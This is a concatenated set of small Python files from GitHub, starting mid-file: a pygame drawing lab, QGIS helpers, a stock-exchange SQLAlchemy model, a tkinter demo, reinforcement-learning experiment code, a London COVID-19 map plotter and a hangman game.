(252, 243, 5)\r\np = (132, 0, 165)\r\no = (249, 137, 11)\r\n\r\n\r\nmyColors = [w, blck, rd, g, b, y, p, o]\r\n\r\nmyWindow = pyg.display.set_mode(res, 
pyg.DOUBLEBUF)\r\nmyWindow.fill(w)\r\nmyCanvas = pyg.Surface((realres[0], realres[1]*0.84)).convert_alpha()\r\nmyCanvas.fill(w)\r\nL1 = myCanvas.copy()\r\nL2 = myCanvas.copy()\r\nL3 = myCanvas.copy()\r\nL4 = myCanvas.copy()\r\nL5 = myCanvas.copy()\r\nlayers = [L1, L2, L3, L4, L5]\r\nfor layer in layers:\r\n layer.fill(clear)\r\noverlay = pyg.Surface(res).convert_alpha()\r\n\r\nrealrect = pyg.Rect(0, 0, realres[0], int(realres[1]*0.84))\r\nscreenrect = pyg.Rect(0, 0, res[0], int(res[1]*0.84))\r\ncolorBar = pyg.Rect(0, 420, 500, 80)\r\n\r\nr = 25\r\nclr = blck\r\nstartpoint = None\r\nendpoint = None\r\nongoing = False\r\nundone = 0\r\nmaxundone = 0\r\nholdClick = False\r\n\r\ndef button(color, rect):\r\n global clr,holdClick\r\n if 0 <= rect <= 9:\r\n rect = pyg.Rect(48*rect+12, 446, 44, 44)\r\n if pyg.mouse.get_pressed()[0] and rect.collidepoint(mosPos) and not holdClick:\r\n clr = color\r\n drects.append(colorBar)\r\n if clr == color:\r\n pyg.draw.rect(overlay, color, rect)\r\n pyg.draw.rect(overlay, blck, rect, 3)\r\n else:\r\n pyg.draw.rect(overlay, color, (rect[0]+4, rect[1]+4, rect[2]-8, rect[3]-8))\r\n pyg.draw.rect(overlay, blck, (rect[0]+4, rect[1]+4, rect[2]-8, rect[3]-8), 3)\r\n\r\ndef drawline():\r\n global startpoint, endpoint, start\r\n if startpoint == None:\r\n startpoint = x, y\r\n endpoint = x, y\r\n if r > 1:\r\n if startpoint != endpoint:\r\n dx, dy = endpoint[0]-startpoint[0], endpoint[1]-startpoint[1]\r\n angle = math.atan2(-dy, dx)%(2*math.pi)\r\n dx, dy = math.sin(angle)*(r*0.999), math.cos(angle)*(r*0.999)\r\n a = startpoint[0]+dx, startpoint[1]+dy\r\n b = startpoint[0]-dx, startpoint[1]-dy\r\n c = endpoint[0]-dx, endpoint[1]-dy\r\n d = endpoint[0]+dx, endpoint[1]+dy\r\n pointlist = [a, b, c, d]\r\n pyg.draw.polygon(L1, clr, pointlist)\r\n pyg.draw.circle(L1, clr, (x, y), r)\r\n else:\r\n pyg.draw.line(L1, clr, startpoint, endpoint, r)\r\n startpoint = x, y\r\n\r\ndef shiftdown():\r\n for layer in reversed(layers):\r\n if layer == L5:\r\n myCanvas.blit(L5, (0, 0))\r\n else:\r\n layers[layers.index(layer)+1].blit(layer, (0, 0))\r\n\r\ndef shiftup():\r\n for layer in layers:\r\n if layer == L5:\r\n layer.fill(clear)\r\n else:\r\n layer.fill(clear)\r\n layer.blit(layers[layers.index(layer)+1], (0, 0))\r\n\r\noverlay.fill(clear)\r\npyg.draw.rect(overlay, gray, colorBar)\r\npyg.draw.rect(overlay, blck, colorBar, 3)\r\n\r\noverlaybg = overlay.copy()\r\n\r\nwhile True:\r\n for event in pyg.event.get():\r\n if event.type == pyg.QUIT or pyg.key.get_pressed()[pyg.K_ESCAPE]:\r\n pyg.quit()\r\n sys.exit()\r\n\r\n if event.type == pyg.MOUSEMOTION:\r\n mosPos = pyg.mouse.get_pos()\r\n x = int(mosPos[0]*(realres[0]/res[0]))\r\n y = int(mosPos[1]*(realres[1]/res[1]))\r\n holdingclick = True\r\n if screenrect.collidepoint(mosPos):\r\n drects.append(screenrect)\r\n\r\n if event.type == pyg.MOUSEBUTTONDOWN:\r\n holdingclick = False\r\n if screenrect.collidepoint(mosPos):\r\n drects.append(screenrect)\r\n\r\n if event.button == 4 and r < 100:\r\n r += 1\r\n drects.append(screenrect)\r\n elif event.button == 5 and r > 2:\r\n r -= 1\r\n drects.append(screenrect)\r\n\r\n if event.type == pyg.KEYDOWN:\r\n\r\n if event.key == pyg.K_DELETE or pyg.K_BACKSPACE:\r\n myCanvas.fill(w)\r\n L1.fill(clear)\r\n L2.fill(clear)\r\n L3.fill(clear)\r\n L4.fill(clear)\r\n L5.fill(clear)\r\n undone = 0\r\n maxundone = 0\r\n drects.append(screenrect)\r\n\r\n\r\n if pyg.mouse.get_pressed()[0] and screenrect.collidepoint(mosPos):\r\n if not ongoing:\r\n while undone > 0:\r\n shiftup()\r\n undone -= 1\r\n 
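# each shiftup() call drops the newest stored layer and pulls the older\r\n                # history forward, discarding the still-undone redo states before a new stroke\r\n                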
maxundone -= 1\r\n shiftdown()\r\n drawline()\r\n ongoing = True\r\n else:\r\n startpoint = None\r\n if ongoing:\r\n if maxundone < 5:\r\n maxundone += 1\r\n ongoing = False\r\n\r\n if screenrect in drects:\r\n\r\n myWindow.fill(w)\r\n for layer in layers:\r\n if layers.index(layer) == undone:\r\n myWindow.blit(pyg.transform.smoothscale(layer, (screenrect[2], screenrect[3])), screenrect)\r\n\r\n overlay.fill(clear)\r\n if r > 1:\r\n pyg.gfxdraw.aacircle(overlay, mosPos[0], mosPos[1], int(r*res[0]/realres[0]), gray)\r\n overlay.blit(overlaybg, screenrect)\r\n for color in myColors:\r\n button(color, myColors.index(color))\r\n myWindow.blit(overlay, screenrect)\r\n\r\n pyg.display.set_caption('Draw | FPS: ' + str(int(windowClock.get_fps())))\r\n windowClock.tick(fps)\r\n\r\n if not updated:\r\n pyg.display.update()\r\n updated = True\r\n pyg.display.update(drects)\r\n drects.clear()","repo_name":"EliVaudrin/etgg1801-lab05-eli_vaudrin","sub_path":"Drawing_Lab05_Eli_Vaudrin.py","file_name":"Drawing_Lab05_Eli_Vaudrin.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7858610361","text":"from qgis.core import *\nfrom qgis.gui import *\nfrom PyQt4.QtGui import *\n\n\ndef get_overlay(overlay_name, uri, style_func):\n registry = QgsMapLayerRegistry.instance()\n layer = None\n for layer_name in registry.mapLayers():\n current_layer = registry.mapLayer(layer_name)\n if current_layer.originalName() == overlay_name:\n layer = current_layer\n break\n if layer is None:\n layer = QgsVectorLayer(uri, overlay_name, 'memory')\n if not layer.isValid():\n raise Exception('Overlay layer is not valid')\n style_func(layer)\n registry.addMapLayer(layer)\n return layer\n\n\ndef remove_all(layer):\n fids = []\n feat = QgsFeature()\n features = layer.getFeatures()\n while features.nextFeature(feat):\n fids.append(feat.id())\n features.close()\n layer.startEditing()\n if not layer.deleteFeatures(fids):\n raise Exception(\"Could not delete features\")\n layer.commitChanges()\n","repo_name":"msieger/swm_nis_topology","sub_path":"topology_plugin/ui/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8913996845","text":"a = [int(input()) for _ in range(9)]\r\n\r\nfind = i =0\r\nwhile not find:\r\n for j in range(i+1, 9):\r\n if sum(a)-a[i]-a[j] == 100:\r\n a.pop(j)\r\n a.pop(i)\r\n a.sort()\r\n find = 1\r\n for elem in a:\r\n print(elem)\r\n break\r\n i += 1","repo_name":"qorjiwon/Algorithm","sub_path":"백준/Bronze/2309. 
일곱 난쟁이/일곱 난쟁이.py","file_name":"일곱 난쟁이.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"14011049203","text":"# data.py\nfrom sqlalchemy import create_engine, Column, Integer, String, Float, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom consts import ordertypes, orderstatuses\n\n# Create a SQLAlchemy database engine\nDATABASE_URL = \"sqlite:///exchange.db\"\nengine = create_engine(DATABASE_URL)\n\n# Create a Session class to interact with the database\nSession = sessionmaker(bind=engine)\n\n# Define the SQLAlchemy model for customer data\nBase = declarative_base()\nclass Customer(Base):\n    __tablename__ = 'customers'\n\n    id = Column(Integer, primary_key=True, index=True)\n    name = Column(String, index=True)\n    account_balance = Column(Float)\n\n# Define the SQLAlchemy model for positions\nclass Position(Base):\n    __tablename__ = 'positions'\n\n    id = Column(Integer, primary_key=True, index=True)\n    customer_id = Column(Integer, ForeignKey('customers.id'), index=True)\n    stock_symbol = Column(String, ForeignKey('stocks.symbol'), index=True)\n    number_of_shares = Column(Integer)\n    bought_at_price = Column(Float)\n    bought_at_date = Column(String)\n\nclass Stock(Base):\n    __tablename__ = 'stocks'\n    \n    id = Column(Integer, primary_key=True, index=True)\n    stock_symbol = Column(String, index=True)\n    company = Column(String, index=True)\n    company_description = Column(String)\n    price = Column(Float, index=True)\n\n\n# Define the SQLAlchemy model for buy and sell orders\nclass Order(Base):\n    __tablename__ = 'orders'\n\n    id = Column(Integer, primary_key=True, index=True)\n    customer_id = Column(Integer, ForeignKey('customers.id'), index=True)\n    order_type = Column(String)  # 'buy' or 'sell'\n    stock_symbol = Column(String, ForeignKey('stocks.symbol'), index=True)\n    quantity = Column(Integer)\n    price = Column(Float)\n    status = Column(String)\n\nBase.metadata.create_all(bind=engine)\n\n\ndef get_all_customers()-> list[Customer]:\n    session = Session()\n    try:\n        customers = session.query(Customer).all()\n        return customers\n    finally:\n        session.close()\n\n\ndef create_new_order(customer_id: int, order_type: String, stock_symbol: String, quantity: int, price: float)-> Order|None:\n    '''\n    Create a new order in the market\n    '''\n    session = Session()\n    new_order = Order(\n        customer_id=customer_id, \n        order_type=order_type, \n        stock_symbol=stock_symbol, \n        quantity=quantity, price=price, \n        status=orderstatuses.ACTIVE\n    )\n    try:\n        session.add(new_order)\n        session.commit()\n        session.refresh(new_order) # get order ID\n        return new_order\n    except:\n        new_order = None\n    finally:\n        session.close()\n    return new_order\n\ndef get_orders(stock_symbol)-> list[Order]:\n    session = Session()\n    try:\n        return session.query(Order).filter(Order.stock_symbol == stock_symbol).all()\n    finally:\n        session.close()\n    return None\n\ndef execute_order(order: int, counterparty: int)-> Order|None:\n    '''\n    Execute the provided order with the customer id provided as counterparty.\n    This will only execute ACTIVE orders, and returns the order if successful, otherwise None.\n    TODO: implement something to indicate why stuff failed\n    '''\n    session = Session()\n    try:\n        # is the order in the correct state?\n        order = session.query(Order).filter(Order.id == order).first()\n        if order is None:\n            return None\n        if order.status != orderstatuses.ACTIVE:\n            return None\n\n
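        # Settlement below runs inside one session: move the cash, move the\n        # shares, mark the last trade price on the stock, then close the order.\n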
        # does the buyer have the funds? First decide who is buying and who is selling.\n        if order.order_type == ordertypes.BUY:\n            buyer_id, seller_id = order.customer_id, counterparty\n        else:\n            buyer_id, seller_id = counterparty, order.customer_id\n        buyer_account = session.query(Customer).filter(Customer.id == buyer_id).first()\n        seller_account = session.query(Customer).filter(Customer.id == seller_id).first()\n        total = order.price * order.quantity\n        if buyer_account is None or seller_account is None:\n            return None\n        if buyer_account.account_balance < total:\n            return None\n\n        # does the seller hold enough of the position?\n        seller = session.query(Position).filter(Position.customer_id == seller_id, Position.stock_symbol == order.stock_symbol).first()\n        if seller is None or seller.number_of_shares < order.quantity:\n            return None\n\n        # fetch (or create) the buyer's position in this stock\n        buyer = session.query(Position).filter(Position.customer_id == buyer_id, Position.stock_symbol == order.stock_symbol).first()\n        create_buyer = False\n        if buyer is None:\n            buyer = Position(customer_id=buyer_id, stock_symbol=order.stock_symbol, number_of_shares=order.quantity, bought_at_price=order.price, bought_at_date='2000-12-31')\n            create_buyer = True\n\n        # update the accounts\n        buyer_account.account_balance -= total\n        seller_account.account_balance += total\n\n        # update the positions\n        if create_buyer:\n            session.add(buyer)\n        else:\n            pr_qty = buyer.number_of_shares\n            pr_avg = buyer.bought_at_price\n            buyer.number_of_shares += order.quantity\n            buyer.bought_at_price = (pr_qty * pr_avg + total)/buyer.number_of_shares\n\n        seller.number_of_shares -= order.quantity\n\n        # update the stock\n        stock = session.query(Stock).filter(Stock.stock_symbol == order.stock_symbol).first()\n        if stock is not None:\n            stock.price = order.price\n\n        # update the order and commit\n        order.status = orderstatuses.CLOSED\n        session.commit()\n        session.refresh(buyer)\n        return order\n    finally:\n        session.close()\n    return None\n\n\ndef create_new_customer(name: String, account_balance: Float)-> Customer|None:\n    '''\n    Create a customer with a name that is not currently in use.\n    name: name to try and create a user with\n    account_balance: initial balance of the account\n    '''\n    session = Session()\n    new_customer = Customer(\n        name=name, \n        account_balance=account_balance)\n    try:\n        # Create a new customer based on the provided data\n        session.add(new_customer)\n        session.commit()\n        session.refresh(new_customer) # Refresh the object to get the generated ID\n    except:\n        new_customer = None\n    finally:\n        session.close()\n\n    return new_customer\n\n\ndef change_account_balance(id: int, change: Float)-> bool:\n    '''\n    Change the balance of the account with the provided id\n    id: The id of the user whose account_balance is being changed\n    change: Amount to change account_balance by\n    '''\n    session = Session()\n    try:\n        # Check if the customer with the given ID exists\n        customer = session.query(Customer).filter(Customer.id == id).first()\n        if customer is None:\n            return False\n\n        # Update the customer's account balance by adding the specified amount\n        customer.account_balance += change\n        session.commit()\n    except:\n        return False\n    finally:\n        session.close()\n\n    return True\n\ndef create_stock(id, symbol, company, company_description, price):\n    session = Session()\n    try:\n
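        # Note: unlike the other helpers here, the caller supplies the primary\n        # key; committing a duplicate id will raise an IntegrityError.\n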
        new_stock = Stock(id=id, stock_symbol=symbol, company=company, company_description=company_description, price=price)\n        session.add(new_stock)\n        session.commit()\n        session.refresh(new_stock)\n        return new_stock\n    finally:\n        session.close()\n    return None","repo_name":"T33py/MyStockMarket","sub_path":"ExchangeAPI/market_data.py","file_name":"market_data.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"22716914133","text":"\"\"\"\n\tSimple Camera (used on Raspberry 3b) Example\n    https://picamera.readthedocs.io/en/release-1.13/recipes1.html\n\"\"\"\nfrom time import sleep\nfrom picamera import PiCamera\n\n\ndef take_picture(name):\n    camera = PiCamera()\n\n    camera.resolution = (200, 266)\n\n    # setting the camera settings\n    camera.brightness = 55\n    camera.contrast = 10\n    camera.sharpness = 50\n    camera.saturation = 0\n\n    camera.start_preview()\n    # Camera warm-up time\n    sleep(2)\n    camera.capture(name)\n    camera.stop_preview()\n","repo_name":"Klark007/Selbstfahrendes-Auto-im-Modell","sub_path":"Camera/Pi_Camera.py","file_name":"Pi_Camera.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"44687970638","text":"from tkinter import *\r\nfrom tkinter.font import *\r\nfrom numpy import random as rn\r\n\r\ndef nameCallback():\r\n    name = e1.get()\r\n    l5.config(text=\"Welcome \"+name)\r\ndef clearEntry():\r\n    e1.delete(0,'end')\r\n    l5.config(text='')\r\ndef randomColor():\r\n    r = rn.randint(0,255)\r\n    g = rn.randint(0,255)\r\n    b = rn.randint(0,255)\r\n    return f'#{r:02x}{g:02x}{b:02x}'\r\n\r\ndef changeColor():\r\n    l5.config(bg=randomColor(),fg=randomColor())\r\nroot = Tk()\r\nroot.geometry('520x250')\r\nroot.title(\"Demo Positioning widgets\")\r\nl1 = Label(borderwidth=2,relief='raised',text='raised,PositionL(5,10)')\r\nl2 = Label(borderwidth=2,relief='ridge',text='ridge,PositionL(5,10)')\r\nl3 = Label(borderwidth=2,relief='groove',text='groove,PositionL(5,10)')\r\nl4 = Label(borderwidth=2,relief='solid',text='solid,PositionL(5,10)')\r\nl5 = Label(fg='green',width=20,borderwidth=2,relief='groove',font='none 20')\r\n\r\nb1 = Button(text='Click',width=40,anchor=CENTER,command=nameCallback)\r\nb2 = Button(text='Random',width=40,anchor=CENTER,command=changeColor)\r\nb3 = Button(text='Clear',width=40,anchor=CENTER)\r\ne1 = Entry()\r\n# e2 = Entry(bg='LightBlue1',fg='Green4',font='none 15',width=45)\r\n\r\n\r\nb3.config(command=clearEntry)\r\n\r\nl1.place(x=5,y=10)\r\nl2.place(x=5,y=40)\r\nl3.place(x=5,y=100)\r\nl4.place(x=5,y=150)\r\nl5.place(x=5,y=200)\r\n\r\nb1.place(x=200,y=10)\r\nb2.place(x=200,y=50)\r\nb3.place(x=200,y=100)\r\ne1.place(x=200,y=150)\r\n# e2.place(x=5,y=200)\r\n\r\nroot.mainloop()","repo_name":"Wiraphong2003/Newmer","sub_path":"testGUI02.py","file_name":"testGUI02.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"13196151361","text":"import os\nimport gym\nfrom stable_baselines import A2C\nfrom stable_baselines import DDPG\nfrom stable_baselines.common import make_vec_env\nfrom stable_baselines.common.cmd_util import make_atari_env\nfrom stable_baselines.common.vec_env import VecFrameStack\nfrom stable_baselines import results_plotter\nfrom stable_baselines.results_plotter import load_results\nfrom stable_baselines.bench import Monitor\nfrom stable_baselines.common.noise import NormalActionNoise, OrnsteinUhlenbeckActionNoise, AdaptiveParamNoiseSpec\nimport numpy as 
np\nfrom matplotlib import pyplot as plt\n\ndef get_a2c_para_dict(gamma, n_step, learning_rate, alpha, epsilon):\n    para_dict = {}\n\n    para_dict[\"gamma\"] = gamma\n    para_dict[\"n_step\"] = n_step\n    para_dict[\"learning_rate\"] = learning_rate\n    para_dict[\"alpha\"] = alpha\n    para_dict[\"epsilon\"] = epsilon\n\n    return para_dict\n\ndef get_ddpg_para_dict(gamma, nb_train_steps, nb_rollout_steps, nb_eval_steps, \n                       batch_size, actor_lr, critic_lr, buffer_size, reward_scale):\n    para_dict = {}\n\n    para_dict[\"gamma\"] = gamma\n    para_dict[\"nb_train_steps\"] = nb_train_steps\n    para_dict[\"nb_rollout_steps\"] = nb_rollout_steps\n    para_dict[\"nb_eval_steps\"] = nb_eval_steps\n    para_dict[\"batch_size\"] = batch_size\n    para_dict[\"actor_lr\"] = actor_lr\n    para_dict[\"critic_lr\"] = critic_lr\n    para_dict[\"buffer_size\"] = buffer_size\n    para_dict[\"reward_scale\"] = reward_scale\n\n    return para_dict\n\ndef run_episode_mean_reward_experiment_a2c(game_name, solved_score, policy, parameter_dict, episode=500, timesteps=25000, render=False, atari_game=False):\n\n    # make environment\n    if not atari_game:\n        env = make_vec_env(game_name)\n    else:\n        env = make_atari_env(game_name, num_env=1, seed=0)\n        env = VecFrameStack(env, n_stack=4)\n\n    # model definition\n    model = A2C(policy, env, verbose=1, gamma=parameter_dict[\"gamma\"]\n                , n_steps=parameter_dict[\"n_step\"]\n                , alpha=parameter_dict[\"alpha\"]\n                , learning_rate=parameter_dict[\"learning_rate\"]\n                , epsilon=parameter_dict[\"epsilon\"])\n\n    episode_rewards = []\n    total_timesteps = 0\n    for i in range(episode):\n        reward_sum = 0\n        done = False\n        obs = env.reset()\n        while not done:\n            action, _states = model.predict(obs)\n            obs, reward, done, info = env.step(action)\n\n            total_timesteps += 1\n            if total_timesteps > timesteps:\n                break\n\n            reward_sum += reward\n            if render == True:\n                env.render()\n        episode_rewards.append(reward_sum)\n\n        if i % 100 == 0:\n            print(\"episode: \"+str(i))\n        # print('\\rEpisode {}, Episode Score: {}, Max: {:.2f}, Min: {:.2f}, Steps: {}'\\\n        #     .format(i, reward_sum, np.max(episode_rewards), np.min(episode_rewards), total_timesteps), end=\"\\n\")\n\n        if reward_sum >= solved_score:\n            break\n    # print('\\rAverage Rewards {}'.format(np.mean(episode_rewards)))\n    # plt.plot(np.arange(1, len(episode_rewards)+1), episode_rewards)\n    # plt.ylabel('episode reward')\n    # plt.xlabel('# of episode')\n    # plt.title('a2c '+game_name)\n    # plt.show()\n    return episode_rewards\n\n\ndef run_experiments_moniter_a2c(game_name, policy, parameter_dict, timesteps=25000, atari_game=False):\n    log_dir = \"/tmp/\"\n\n    # make environment\n    if not atari_game:\n        env = make_vec_env(game_name)\n    else:\n        env = make_atari_env(game_name, num_env=1, seed=0)\n        env = VecFrameStack(env, n_stack=4)\n\n    env = Monitor(env, log_dir)\n\n    # model definition\n    model = A2C(policy, env, verbose=1, gamma=parameter_dict[\"gamma\"]\n                , n_steps=parameter_dict[\"n_step\"]\n                , alpha=parameter_dict[\"alpha\"]\n                , learning_rate=parameter_dict[\"learning_rate\"]\n                , epsilon=parameter_dict[\"epsilon\"])\n    model.learn(timesteps)\n\n    results_plotter.plot_results([log_dir], timesteps, results_plotter.X_TIMESTEPS, \"A2C \"+game_name)\n    plt.show()\n\n\ndef run_episode_mean_reward_experiment_ddpg(game_name, solved_score, policy, parameter_dict, episode=500, timesteps=25000, render=False, atari_game=False):\n\n    # make environment\n    if not atari_game:\n        env = make_vec_env(game_name)\n    else:\n        env = make_atari_env(game_name, num_env=1, seed=0)\n        env = VecFrameStack(env, n_stack=4)\n\n    n_actions = env.action_space.shape[-1]\n    action_noise = OrnsteinUhlenbeckActionNoise(mean=np.zeros(n_actions), sigma=float(0.5) * np.ones(n_actions))\n\n    
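# note: the OU action noise above is currently unused, since DDPG below is given action_noise=None\n    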
# model definition\n    model = DDPG(policy, env, action_noise=None, verbose=1, gamma=parameter_dict[\"gamma\"]\n                 , nb_train_steps=parameter_dict[\"nb_train_steps\"]\n                 , nb_rollout_steps=parameter_dict[\"nb_rollout_steps\"]\n                 , nb_eval_steps=parameter_dict[\"nb_eval_steps\"]\n                 , batch_size=parameter_dict[\"batch_size\"]\n                 , actor_lr=parameter_dict[\"actor_lr\"]\n                 , critic_lr=parameter_dict[\"critic_lr\"]\n                 , buffer_size=parameter_dict[\"buffer_size\"]\n                 , reward_scale=parameter_dict[\"reward_scale\"])\n\n    episode_rewards = []\n    total_timesteps = 0\n    for i in range(episode):\n        reward_sum = 0\n        done = False\n        obs = env.reset()\n        while not done:\n            action, _states = model.predict(obs)\n            obs, reward, done, info = env.step(action)\n            total_timesteps += 1\n\n            if total_timesteps > timesteps:\n                break\n\n            if render == True:\n                env.render()\n\n            reward_sum += reward\n        episode_rewards.append(reward_sum)\n\n        if i % 100 == 0:\n            print(\"episode: \"+str(i))\n\n        # print('\\rEpisode {}, Episode Score: {}, Max: {:.2f}, Min: {:.2f}, total_steps: {:.2f}'\\\n        #     .format(i, reward_sum, np.max(episode_rewards), np.min(episode_rewards), total_timesteps), end=\"\\n\")\n\n        if reward_sum >= solved_score:\n            break\n    # print('\\rAverage Rewards {}'.format(np.mean(episode_rewards)))\n    # plt.plot(np.arange(1, len(episode_rewards)+1), episode_rewards)\n    # plt.ylabel('episode reward')\n    # plt.xlabel('# of episode')\n    # plt.title('ddpg '+game_name)\n    # plt.show()\n    return episode_rewards\n    ","repo_name":"shizhec/Unimelb-MCS-RL-A2C","sub_path":"experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71442399849","text":"# Check whether the given number is a Fibonacci number or not\n\nimport math\n\ndef isPerfectSquare(x):\n    s = int(math.sqrt(x))\n    return s * s == x\n\ndef isFibonacci(n):\n    return isPerfectSquare(5 * n * n + 4) or isPerfectSquare(5 * n * n - 4)\n\nfor i in range(1,11):\n    if (isFibonacci(i) == True):\n        print(i,\" is a Fibonacci number\")\n    else:\n        print(i,\" is not a Fibonacci number\")","repo_name":"smitjogani/python","sub_path":"march/march3.py","file_name":"march3.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1522331503","text":"import matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport pickle\nfrom pathlib import Path\nimport shutil\nimport numpy as np\nfrom itertools import compress\nfrom process_data import getData\nfrom util import calBinsScale, getPlotPicklePath, classifyDf\nfrom plot import plotCase, plotName, plotCasePickle\nimport warnings\n\n\ndef adjustNameLdn(xcoord, ycoord, name):\n    \"\"\"\n    annotation adjustments for London boroughs\n    \"\"\"\n    if name == \"City of London\":\n        font = FontProperties(family=\"Palatino\", size=3)\n    else:\n        font = FontProperties(family=\"Palatino\", size=4)\n    if name == \"Hammersmith and Fulham\":\n        xcoord += 0.015\n        ycoord -= 0.015\n    if name == \"Kensington and Chelsea\":\n        xcoord -= 0.015\n        ycoord += 0.01\n    if name == \"Westminster\":\n        xcoord += 0.01\n        ycoord -= 0.005\n    if name == \"Camden\":\n        xcoord -= 0.005\n    if name.startswith(\"Hackney\"):\n        xcoord += 0.015\n    if name == \"Barking and Dagenham\":\n        ycoord -= 0.005\n    if name == \"Lewisham\":\n        ycoord -= 0.005\n    
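# boroughs not matched above keep their default label position\n    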
return xcoord, ycoord, name, font\n\n\ndef plotLdn():\n    fig, ax = plt.subplots(1, figsize=(6, 4))\n\n    caseDates, caseGeo = getData(loc=\"London\")\n\n    binsScale = calBinsScale(caseGeo[caseDates[-1]])\n    plotPicklePath = Path(getPlotPicklePath(binsScale, loc=\"ldn\"))\n    rebase = False\n    if not plotPicklePath.is_file():\n        rebase = True\n    else:\n        with warnings.catch_warnings(record=True) as w:\n            with open(plotPicklePath, \"rb\") as f:\n                ax = pickle.load(f)\n            try:\n                rebase = \"This figure was saved with matplotlib version\" in str(\n                    w[-1].message\n                )\n            except IndexError:\n                pass\n\n    if rebase:\n        caseDate = caseDates[-1]\n        plotCase(ax, caseGeo, caseDate)\n        plotName(caseGeo, adjustNameLdn)\n        plt.text(\n            0.1,\n            0.05,\n            caseDate.strftime(\"%d %b %Y\"),\n            transform=ax.transAxes,\n            fontproperties=FontProperties(family=\"Palatino\", size=8),\n            label=\"dateText\",\n        )\n        with open(plotPicklePath, \"wb\") as f:\n            pickle.dump(ax, f, pickle.HIGHEST_PROTOCOL)\n\n    caseToday = (\n        caseGeo.drop(columns=[\"geometry\", \"coords\"], errors=\"ignore\")\n        .set_index(\"name\")\n        .transpose()\n    )\n    caseYesterdayPicklePath = Path(\n        \"data\", \"pickle\", \"_\".join([\"cases\", \"ldn\", \"yesterday\"]) + \".pickle\"\n    )\n    if (not rebase) and caseYesterdayPicklePath.is_file():\n        with open(caseYesterdayPicklePath, \"rb\") as f:\n            caseYesterday = pickle.load(f)\n        caseDiff = (\n            classifyDf(caseYesterday, binsScale)\n            .eq(classifyDf(caseToday, binsScale))\n            .all(axis=1)\n            .to_numpy()\n        )\n    else:\n        caseDiff = np.full(len(caseDates), False)\n\n    for caseDate in compress(caseDates, ~caseDiff):\n        plt.cla()\n        ax = plotCasePickle(binsScale, caseGeo, caseDate, plotPicklePath)\n        caseImgPath = Path(\n            \"docs\",\n            \"img\",\n            \"_\".join([\"ldn\", \"cases\"]),\n            \"_\".join([\"ldn\", \"cases\", caseDate.strftime(\"%Y_%m_%d\")]) + \".png\",\n        )\n        plt.savefig(caseImgPath, dpi=300, transparent=False)\n        if caseDate == caseDates[-1]:\n            caseLatestImgPath = Path(\n                \"docs\", \"img\", \"_\".join([\"ldn\", \"cases\", \"latest\"]) + \".png\"\n            )\n            shutil.copy2(caseImgPath, caseLatestImgPath)\n\n    with open(caseYesterdayPicklePath, \"wb\") as f:\n        pickle.dump(caseToday, f, pickle.HIGHEST_PROTOCOL)\n\n    plt.close(\"all\")\n","repo_name":"airallergy/covid-19-choropleth-map-uk","sub_path":"scripts/plot_ldn_latest.py","file_name":"plot_ldn_latest.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"14344824438","text":"from random import *\r\n\r\n#variables\r\nmax = 7\r\nfails = 0\r\nsofar = []\r\n\r\n#list of words that could be randomly picked\r\nwords = ['artist' , 'spiderman', 'multiverse' , 'science' , 'animation', \"oregano\", 'dog', 'skrt' , 'yeet','thicc' , 'wacc']\r\n\r\n#picks a word from the list and converts it into a list of letters\r\npickwordnum = randint(0, len(words)-1)\r\npickword = words[pickwordnum]\r\nword = list(pickword)\r\nguessword = []\r\n\r\n#replacing letters with spaces\r\nfor letter in word:\r\n    guessword = guessword + [' ']\r\n\r\n#game stuff\r\nwhile fails < max :\r\n    #prints spaces\r\n    print(guessword)\r\n    #input for guess\r\n    guess = input(\"guess a letter : \")\r\n\r\n    #can't repeat guesses\r\n    if guess in sofar:\r\n        print(\"you've already guessed that!\")\r\n        print(\"Guesses so far: \" , sofar)\r\n    else:\r\n        #shows guesses\r\n        sofar.append(guess)\r\n        print(\"Guesses so far: \" , sofar )\r\n\r\n        #replaces spaces with letters\r\n        for idx, letter in enumerate(word):\r\n            if letter == guess:\r\n                guessword[idx] = guess\r\n\r\n        
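#note: the loop above reveals every occurrence of the guessed letter at once\r\n\r\n        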
#adds to fail tally if the guess is wrong\r\n        if guess not in word :\r\n            fails = fails + 1\r\n\r\n    #when completed\r\n    if guessword == word :\r\n        print(\"You got it! the word was \" + pickword + '!')\r\n        break\r\n\r\n    #prints the amount of tries left\r\n    print(\"You have \" + str(max - fails) + \" tries left\")\r\n","repo_name":"yeethaw/girls-who-code-stuff","sub_path":"python/Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
